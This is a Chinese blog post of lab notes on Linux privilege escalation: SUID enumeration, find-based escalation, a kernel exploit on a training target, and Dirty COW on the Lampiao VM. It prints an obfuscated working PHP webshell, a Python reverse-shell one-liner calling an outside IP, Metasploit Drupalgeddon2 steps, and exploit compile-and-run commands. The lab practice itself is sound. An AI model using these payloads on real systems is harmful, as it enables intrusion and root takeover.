您现在的位置是:首页 > 正文

linux提权(find、CVE-2017-1699、dirtycow)

2024-04-01 01:51:27阅读 1

探针是否有SUID

1.命令

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

2.脚本文件

LinEnum.sh traitor linuxprivchecker

3.下载地址

https://github.com/liamg/traitor //综合类探针

https://github.com/AlessandroZ/BeRoot //自动化提权

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks //信息收集

https://github.com/mzet-/linux-exploit-suggester //漏洞探针

https://github.com/sleventyeleven/linuxprivchecker //信息收集

https://github.com/jondonas/linux-exploit-suggester-2 //漏洞探针

4.二进制文件提权查询:

Linux:https://gtfobins.github.io/

Windows:https://lolbas-project.github.io/

1、find提权

实验环境:两台ubuntu、PHPstudy搭建的网站、网站中存在webshell,冰蝎连接联动MSF提权,服务器中给find命令为suid权限(chmod u+s /usr/bin/find

(1)冰蝎连接webshell

遇到的问题:冰蝎连不上webshell,蚁剑,哥斯拉能连,通过将网站中间件换为nginx,换高版本的php,换webshell尝试连接成功。

php木马:

<?php @error_reporting(0);session_start();$key="1a1dc91c907325c6";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$H64YE=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$H64YE=$t($H64YE."");for($i=0;$i<strlen($H64YE);$i++) { $new_key = $key[$i+1&15];$H64YE[$i] = $H64YE[$i] ^ $new_key;} }else{ $H64YE=openssl_decrypt($H64YE, "AES128", $key);}$arr=explode('|',$H64YE);$func=$arr[0];$params=$arr[1];class GPDS5S59{ public function __invoke($p) {@eval("/*Z9I199N2vU*/".$p."");}}@call_user_func/*Z9I199N2vU*/(new GPDS5S59(),$params);?>

(2)MSF使用冰蝎的反弹shell的模块(set payload php/meterpreter/reverse_tcp)

(3)进入MSF

shell

find / -user root -perm -4000 -print 2>/dev/null

(4)利用find进行提权

touch dafei

find dafei -exec whoami \;

  1. 反弹shell到Xshell

MSF:

find dafei -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("129.211.214.217",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;

终端:

nc -lvp 7777

2、墨者(Ubuntu16.04提权)CVE-2017-1699

(1)Xshell连接靶机

(2)使用les.sh脚本,进行探针漏洞

(3)下载45010的exp,传入靶机

(4)查看代码说明,执行相应的代码

gcc 45010.c -o exp

./exp

id

3、vulnhub-Lampiao 权限提升(dirtycow)

(1)下载靶场环境

(2)从虚拟机中打开靶机,kali上使用nmap扫描开启80端口的IP地址

(3)nmap扫描靶机的端口

(4)使用MSF的shell模块(exploit/unix/webapp/drupal_drupalgeddon2)

search drupal

use exploit/unix/webapp/drupal_drupalgeddon2

set rhost 192.168.78.131

set rport 1898

run

上传漏洞探针脚本

meterpreter > upload /root/les.sh /var/www/html

shell

chmod +x les.sh

./les.sh

下载exp,传入靶机服务器的pwd目录下

upload /root/40847.cpp var/wwww/html/40847.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'

./dcow

更改了root密码

su root

提权成功

网站文章

  • html 文字不可选择,css文字不可选怎么做?

    html 文字不可选择,css文字不可选怎么做?

    css设置文字不可选使用user-select属性,user-select属性设置或检索是否允许用户选中文本,下面我们来看一下使用user-select属性设置文字不可选的方法。css设置文字不可选示...

    2024-04-01 01:51:02
  • WTM+LayUI 子表批量上传文件

    WTM+LayUI 子表批量上传文件

    一个带有的Model,实现批量新增。

    2024-04-01 01:50:56
  • 使用PyQt5创建和编写.qrc资源文件

    在PyQt5中,可以使用.qrc资源文件来管理应用程序中的来管理应用程序中的静态资源,如图像、样式表和其他文件。一旦创建和编写.qrc文件,我们需要将其编译为Python代码,以便在应用程序来管理应用...

    2024-04-01 01:50:50
  • 全面盘点‘’一网打尽‘’,架构师的必备技能(微服务、高并发、大数据、缓存等中间件)是如何炼成的?

    全面盘点‘’一网打尽‘’,架构师的必备技能(微服务、高并发、大数据、缓存等中间件)是如何炼成的?

    现代的互联网体系结构面临着异常庞杂的服务拓扑,如何合理地进行服务治理是架构师领域核心的一个命题。业务领域、基础架构领域、组织结构领域,如何做服务治理?服务治理是如何一步步演变进化的?我们未来又将面临哪...

    2024-04-01 01:50:42
  • 用单例封装 SharedPreferences

    自己封装的 SharedPreferences,很简单的封装,直接上代码public class SPManager { private static final String ACCOUNT = "account"; private static final String PASSWORD = "password"; private st

    2024-04-01 01:50:17
  • pta 乙级 1012 数字分类 (20 分)

    pta 乙级 1012 数字分类 (20 分)

    给定一系列正整数,请按要求对数字进行分类,并输出以下 5 个数字:A1​= 能被 5 整除的数字中所有偶数的和; A2​= 将被 5 除后余 1 的数字按给出顺序进行交错求和,即计算n1​−n2​+n...

    2024-04-01 01:50:11
  • C++中struct与class的区别

    从语法上,在C++中(只讨论C++中)。class和struct做类型定义时只有两点区别: (一)默认继承权限。如果不明确指定,来自class的继承按照private继承处理,来自struct的继承按照public继承处理; (二)成员的默认访问权限。class的成员默认是private权限,struct默认是public权限。 除了这两点,class和struct基本就是一个东西。语法上没有任何

    2024-04-01 01:50:03
  • OSPF综合实验

    OSPF综合实验

    要求:配置area0r3r4r5r6r7配置MGREr3r5r6r7配置环回area1r1r2r3area2r6r11r12area3r7r8r9area4r9r10rip开启ospfr1r2r3r4r5r6r7r8r9r10r11r12

    2024-04-01 01:49:37
  • 微服务中的分布式事务管理 - 2/2 Saga异步模式

    微服务中的分布式事务管理 - 2/2 Saga异步模式

    在这篇文章中,我们看到了什么是微服务中事务管理的异步模式,还探索了Saga模式及其两个变体,即基于Choreography和基于Orchestrator的模式。我们深入了解了这两种模式,然后讨论了它们...

    2024-04-01 01:49:29
  • 长篇阅读做题技巧

    长篇阅读做题技巧

    六级长篇阅读解题办法

    2024-04-01 01:49:24